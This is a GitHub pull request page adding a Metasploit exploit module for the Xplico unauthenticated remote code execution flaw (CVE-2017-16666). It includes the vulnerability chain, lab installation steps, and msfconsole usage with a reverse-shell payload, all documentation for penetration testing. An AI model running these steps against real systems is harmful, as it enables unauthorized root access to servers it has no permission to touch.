New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Xplico Remote Code Execution Module #9206
Conversation
Xplico? Wow. I used to use that (locally). :D |
All yours, @dmohanty-r7. |
Release NotesThis PR adds an exploit module for Xplio (CVE-2017-16666). It leverages three vulnerabilities to get unauthenticated remote code execution: An exposed user registration page, a weak randomization algorithm to generate the activation code, and a command injection in parsing an uploaded pcap. @mmetince covers the vulnerability via blog post: https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666 |
Tested with reverse_awk and reverse_netcat:
|
This module exploits command injection vulnerability. Unauthenticated users can register a new account and then execute a terminal command under the context of the root user.
Vulnerable Application Installation Steps
Follow instruction from "from sourceforge" section at following URL. Don't forget install version 1.2.0 instead of 1.0.0. At the time of this writing, installation commands contains command for version 1.0.0
http://wiki.xplico.org/doku.php?id=ubuntu
You may also give a try to virtualbox image provided by maintainer of Xplico.
https://sourceforge.net/projects/xplico/files/VirtualBox%20images/
Verification Steps
A successful check of the exploit will look like this:
msfconsole
use exploit/linux/http/securityonion_xplico_exec
RHOST
PAYLOAD cmd/unix/reverse_awk
LHOST
exploit
New user successfully registered
in console.User successfully activated
in console.Successfully authenticated
in console.New Case successfully creted
in console.New Sols successfully creted
in console.PCAP successfully uploaded. Pcap parser is going to start on server side
in console.We are at PCAP decoding phase. Little bit more patience...
in console.Scenarios
Technical Details and Demo
https://pentest.blog/advisory-xplico-unauthenticated-remote-code-execution-cve-2017-16666/